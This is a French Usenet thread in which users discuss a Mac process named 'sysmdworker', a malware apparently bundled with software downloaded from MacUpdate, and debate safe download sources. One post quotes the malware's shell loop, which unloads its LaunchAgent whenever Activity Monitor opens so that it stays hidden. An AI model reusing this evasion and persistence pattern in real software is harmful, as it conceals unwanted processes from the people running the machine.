sysmdworker ?

fra-PasDeSp
Bonjour

C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.

Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.

Bizarre. Qui peut m'en dire plus ?
--
Fra

2 3 4 5 6
fra-PasDeSp
MV wrote:
Il me semble qu'il y avait eu des commentaires négatifs sur les
téléchargements sur MacUpdate (entre autres) il y a un certain temps, je
me trompe ?

A un moment ils envoyaient un installeur de leur cru en lousedé avec des
toolbars à la con. Mais ça se voyait bien. Après ça a ensuite été
clairement séparé.
En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les
éditeurs eux-mêmes dans la mesure du possible.

Bon c'est vrai, mais jusqu'ici je n'ai jamais eu de probleme avec ce
site.
Et le fait de télécharger chez l'éditeur n'est pas non plus une
garantie. Je me souviens d'un logiciel de torrent qui s'était fait
infecté de la même façon.
--
Fra
fra-PasDeSp
MV wrote:
Fra wrote:
-----
while [ 1 ]
do
if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null)
then
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist
elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null)
then
launchctl load -w ~/Library/LaunchAgents/MacOS.plist
fi
sleep 5
Done
-----

C'est supposé faire quoi ? Tu pourrais dire ?

Bein
if "Activity Monitor"
then unload MacOS.plist
en gros !
--
Fra
fra-PasDeSp
MV wrote:
Oh putain ! J'ai tout compris de travers ! J'ai cru qu'il fallait taper
ces lignes dans le Terminal pour se débarrasser de la cochonnerie ! ;-)

:D
Ca t'aurais pas faire courir grand risque !
Si t'as pas le malware rien ne se passe ; si tu l'as bein ça tourne
déjà.
--
Fra
pehache
Le 02/02/2018 à 18:22, MV a écrit :
Fra a attiré mon attention en écrivant :
Elle n'a pas fonctionnée mais a installé le malware.

[...]
Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit
chez eux.

Ici il a toujours été de bon ton de vanter MacUpdate comme source de
logiciels. A une époque je m'en étais "ému" (pour les raisons que tu
évoques), et les macounets canal historique avaient fait les gros yeux,
sur l'air de "ça se voit que tu as les réflexes de Windowsien, sache que
yapa de virus sur Mac, et les macounets sont une grande famille dans
laquelle on se fait confiance"
pom pom pom...
DV
pehache a écrit ceci :
Ici il a toujours été de bon ton de vanter MacUpdate comme source de
logiciels.

Toujours ? Pas depuis que je fréquente ce groupe en tout cas (2013).
A une époque je m'en étais "ému" (pour les raisons que tu
évoques),

Le dernier à s'en être ému ici est — c'est à peine croyable — un certain
Fra, qui écrivit ceci en octobre 2015 :
"MacUpdate commence à remplacer de plus en plus de liens de
téléchargement par leur installeur qui installe des spywares yahoo.
[...] Connaissez vous une alternative à MacUpdate où je pourrais
télécharger mes mises à jour de logiciels sans installeur de spyware
(lien direct vers la version du développeur) ?"
<1md4cri.1n38c9ch1mmn9N%
[...]

J'adore quand tu racontes tes guerres, mais celle-ci a l'air de dater
sérieusement. ;-)
--
Denis
pehache
Le 03/02/2018 à 07:44, DV a écrit :
pehache a écrit ceci :
[...]

Comme quoi un homme averti n'en vaut pas toujours deux...
[...]

Ca ne doit pas être plus vieux que 2011, néanmoins.
DV
Fra a écrit ceci :
A un moment ils envoyaient un installeur de leur cru en lousedé avec des
toolbars à la con. Mais ça se voyait bien. Après ça a ensuite été
clairement séparé.

Super prudent, disais-tu ? À te lire, je dirais plutôt super naïf.
[...]

Personne n'est à l'abri d'un piratage. Mais il y a quand même une grosse
différence entre un éditeur qui se fait pirater et remédie au problème
le plus rapidement possible, et une société qui diffuse sciemment des
cochonneries et n'arrête de le faire que lorsque ça se voit trop.
--
Denis
fra-PasDeSp
DV wrote:
[...]

Je cherche toujours ce remplaçant !
--
Fra
mv
DV a attiré mon attention en écrivant :
[...]

Puis-je pouffer ? ;-)
Cordialement.
Nouveau : <http://art-doise-4.michelvauquois.free-h.fr>
et <http://art-doise-5.michelvauquois.free-h.fr>
DV
Fra a écrit ceci :
DV wrote:
[...]

Sur le site de MacUpdate lui-même, la plupart des pages comportent un
lien vers le site du développeur ("Developer website", en haut à
droite). S'il n'y en a pas (en général parce que l'application concernée
n'est plus maintenue), on s'abstient, c'est tout.
--
Denis
2 3 4 5 6